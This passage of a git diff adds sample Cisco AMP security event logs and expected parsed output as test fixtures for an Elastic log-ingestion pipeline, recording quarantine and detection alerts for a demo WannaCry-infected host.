+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json
new file mode 100644
index 00000000000..c2aa4b46070
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json
@@ -0,0 +1,4310 @@ +{ + "expected": [ + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094001496Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", 
+ "id": "6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419229327140847664", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094015339Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419229327140847663", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + 
"10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094017473Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + 
"related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419229327140847662", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094019533Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 
found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + }, + "detection_id": "6419229327140847661", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094021497Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Cannot delete", + "error_code": 3221225761 + }, + "detection_id": "6419229327140847659", + 
"event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:32:10.094023420Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": 
"alert", + "action": "Quarantine Failure", + "id": "6419229331435815000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419229327140847657", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "file": { + "name": "tasksche.exe", + "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "hash": { + "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 